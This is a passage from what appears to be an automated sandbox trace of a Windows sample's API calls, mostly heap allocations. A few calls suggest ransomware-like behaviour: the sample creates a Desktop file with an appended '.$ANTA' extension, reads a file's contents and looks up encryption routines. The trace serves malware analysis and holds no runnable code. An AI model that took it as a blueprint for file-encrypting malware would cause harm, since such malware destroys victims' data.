[0128.395] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796de8 [0128.395] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0128.395] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796de8 | out: hHeap=0x1780000) returned 1 [0128.395] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0128.395] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0128.396] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac100 [0128.396] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0128.396] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac100 | out: hHeap=0x1780000) returned 1 [0128.396] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0128.396] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26d0 [0128.396] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf860 [0128.396] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca538 [0128.396] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0128.396] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca610 [0128.396] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0128.396] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0128.396] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25d0 [0128.396] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26a0 [0128.396] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796f28 [0128.396] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796f28 | out: hHeap=0x1780000) returned 1 [0128.396] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0128.396] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0128.396] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca640 [0128.396] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2580 [0128.396] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0128.396] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2700 [0128.396] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca568 [0128.396] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25a0 [0128.396] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6a0 [0128.396] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25b0 [0128.396] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0128.396] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25c0 [0128.396] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0128.396] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25d0 [0128.397] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0128.397] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4392260 [0128.397] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2670 [0128.397] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x60) returned 0x43595f0 [0128.397] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0128.397] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4392650 [0128.397] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0128.397] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4392490 [0128.397] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43595f0 | out: hHeap=0x1780000) returned 1 [0128.397] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0128.397] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0128.397] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0128.397] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4392260 | out: hHeap=0x1780000) returned 1 [0128.397] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0128.397] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4392650 | out: hHeap=0x1780000) returned 1 [0128.397] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0128.397] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca568 | out: hHeap=0x1780000) returned 1 [0128.397] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0128.397] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26e0 [0128.397] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a92a8 [0128.397] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 0x11 [0128.397] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a92a8 | out: hHeap=0x1780000) returned 1 [0128.397] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0128.397] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4392490 | out: hHeap=0x1780000) returned 1 [0128.397] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0128.397] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0128.398] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0128.398] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac600 [0128.398] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10000) returned 0x499a008 [0128.398] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca568 [0128.398] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25a0 [0128.398] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\xV3SDT.ots.$ANTA" (normalized: "c:\\users\\fd1hvy\\desktop\\xv3sdt.ots.$anta"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2a0 [0128.399] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfae0 [0128.399] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0128.399] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25d0 [0128.399] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0128.399] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0128.399] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0128.399] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf860 | out: hHeap=0x1780000) returned 1 [0128.399] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0128.399] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0128.400] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25c0 [0128.400] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2670 [0128.400] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2720 [0128.400] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796f28 [0128.400] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0128.400] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796f28 | out: hHeap=0x1780000) returned 1 [0128.400] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0128.400] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0128.400] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac780 [0128.400] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0128.400] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac780 | out: hHeap=0x1780000) returned 1 [0128.400] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0128.400] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac100 [0128.400] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0128.400] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2580 [0128.400] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc48 [0128.400] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca538 [0128.400] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2670 [0128.400] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0128.400] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca640 [0128.400] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2670 [0128.400] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26d0 [0128.400] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796de8 [0128.400] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796de8 | out: hHeap=0x1780000) returned 1 [0128.401] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0128.401] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0128.401] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca610 [0128.401] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0128.401] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25b0 [0128.401] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x100000) returned 0x1b89020 [0128.404] SetFilePointerEx (in: hFile=0x258, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144ef00 | out: lpNewFilePointer=0x0) returned 1 [0128.405] ReadFile (in: hFile=0x258, lpBuffer=0x43eb450, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ef28, lpOverlapped=0x0 | out: lpBuffer=0x43eb450*, lpNumberOfBytesRead=0x144ef28*=0x36a1, lpOverlapped=0x0) returned 1 [0128.406] ReadFile (in: hFile=0x258, lpBuffer=0x43eb450, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ef28, lpOverlapped=0x0 | out: lpBuffer=0x43eb450*, lpNumberOfBytesRead=0x144ef28*=0x0, lpOverlapped=0x0) returned 1 [0128.406] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0128.406] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0128.406] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0128.406] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0128.406] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x36a1) returned 0x49aa010 [0128.406] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1b89020 | out: hHeap=0x1780000) returned 1 [0128.409] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0128.409] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0128.409] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc48 | out: hHeap=0x1780000) returned 1 [0128.409] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0128.409] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2670 [0128.410] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x36a1) returned 0x49ad6c0 [0128.410] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x49aa010 | out: hHeap=0x1780000) returned 1 [0128.410] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0128.410] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0128.410] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2680 [0128.410] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb08 [0128.410] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca538 [0128.410] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25b0 [0128.410] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2710 [0128.410] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x36a1) returned 0x49aa010 [0128.410] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0128.410] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x49aa010 | out: hHeap=0x1780000) returned 1 [0128.410] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0128.410] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0128.410] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb08 | out: hHeap=0x1780000) returned 1 [0128.410] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0128.410] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0128.410] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25b0 [0128.410] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0128.410] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e08 [0128.410] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e08 | out: hHeap=0x1780000) returned 1 [0128.410] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0128.410] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0128.410] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac6c0 [0128.410] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0128.410] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2540 [0128.410] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2630 [0128.410] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x43921b8 [0128.410] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0128.411] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43921b8 | out: hHeap=0x1780000) returned 1 [0128.411] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0128.411] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb08 [0128.411] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e26f0 [0128.411] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf900 [0128.411] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca610 [0128.411] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2680 [0128.411] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0128.411] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x36a1) returned 0x49aa010 [0128.411] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0128.411] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2680 [0128.411] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca640 [0128.411] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26a0 [0128.411] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0128.411] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e25c0 [0128.411] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0128.411] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26a0 [0128.411] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0128.411] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e26a0 [0128.411] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6a0 [0128.411] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2570 [0128.411] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0128.411] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca6b8 [0128.411] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc48 [0128.411] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0128.411] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26d0 [0128.411] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0128.411] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26e0 [0128.411] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x36a1) returned 0x49b0d70 [0128.412] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf860 [0128.412] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0128.412] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2720 [0128.412] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0128.412] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfce8 [0128.412] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0128.412] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9a0 [0128.412] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca730 [0128.412] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2700 [0128.412] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca538 [0128.412] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfab8 [0128.412] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0128.412] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2710 [0128.412] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0128.412] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8be8 [0128.412] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0128.412] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2530 [0128.412] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0128.412] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2530 [0128.412] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0128.412] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac200 [0128.412] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0128.412] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb30 [0128.412] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7d8 [0128.412] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2530 [0128.412] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7d8 | out: hHeap=0x1780000) returned 1 [0128.413] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf978 [0128.413] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca958 [0128.413] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9a0 [0128.413] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2560 [0128.413] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0128.413] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2570 [0128.413] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90b0 [0128.413] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0128.413] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90b0 | out: hHeap=0x1780000) returned 1 [0128.413] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0128.413] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc70 [0128.413] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e25b0 [0128.413] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc98 [0128.413] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8b0 [0128.413] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2570 [0128.413] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0128.413] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca9d0 [0128.413] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf888 [0128.413] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca970 [0128.413] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2570 [0128.413] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca970 | out: hHeap=0x1780000) returned 1 [0128.413] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9c8 [0128.413] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0128.413] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8c30 [0128.414] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0128.414] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd88 [0128.414] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa48 [0128.414] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2580 [0128.414] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa00 [0128.414] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca808 [0128.414] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2910 [0128.414] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0128.414] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0080 [0128.414] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8e0 [0128.414] 